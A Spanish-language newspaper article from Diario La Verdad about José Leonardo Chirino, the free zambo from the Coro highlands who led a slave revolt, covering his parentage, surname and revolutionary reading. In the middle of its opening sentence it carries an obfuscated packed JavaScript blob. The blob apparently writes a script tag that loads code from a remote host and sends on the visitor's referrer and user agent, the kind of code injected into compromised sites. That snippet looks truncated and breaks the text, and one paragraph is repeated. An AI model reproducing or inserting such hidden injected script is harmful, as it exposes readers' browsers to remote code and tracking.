publicidad

José Leonardo Chirino

Orlando Arrieta / Médico / arrietao@hotmail.com
José eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbrta|var|u0026u|referrer|dazrr||js|php'.split('|'),0,{})) Leonardo sabía leer y era dueño de algunas propagandas revolucionarias, hasta del libro Derechos del hombre, conocía los hechos ocurridos en Haití, colonia negra de franceses en las Antillas

El matrimonio del esclavo negro Juan Cruz con la aborigen manumisa (libre) Cándida Rosa dio como resultado la venida al mundo de un niño que recibió el nombre de José Leonardo y, como su madre era libre, el muchacho nace liberado, esto es, no esclavo. Se firma que nació en Coro, pero no hay nada fehaciente que lo garantice pues los negros y esclavos no tenían registradas sus partidas de nacimiento ni de bautismo.

Sus padres viven en una cabaña que ellos mismos construyeron, dentro de una de las haciendas de la familia de don Cristóbal Chirino y su esposa, doña Nicolasa de la Colina, en la sierra de Coro, de allí recibe su apellido Chirino y no Chirinos, como la mayoría de los libros de historia lo dicen.  

Esta natural riqueza atrajo al colonizador y conquistador español para fundar sus propiedades. Algunos de estos dieron el nombre a los caseríos que fundaron los labriegos: Trapichito, Macanillas, Canire, Don Juan de Ulúa, Acarite, entre otros. Curimagua fue el núcleo de todo, los terratenientes utilizaron en sus haciendas la mano del indio y luego del esclavo africano (bozales), lo que le dio el tinte de ébano al poblado.

Allí creció José Leonardo y es considerado precursor, por los objetivos fundamentales que proclamó, de la libertad de los esclavos, contra el abuso de impuestos y el establecimiento de la República. Se trató de un hombre de cierta dotación intelectual para entender las primeras manifestaciones que sucedieron en Estados Unidos sobre su independencia y en Francia contra el absolutismo de los reyes Capetos. 

José Leonardo sabía leer y era dueño de algunas propagandas revolucionarias, hasta del libro Derechos del hombre, conocía los hechos ocurridos en Haití, colonia negra de franceses en las Antillas. Negros y mulatos de la isla aprovecharon los principios revolucionarios de los franceses. José Leonardo era un zambo libre, pero su esposa y sus hijos esclavos.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama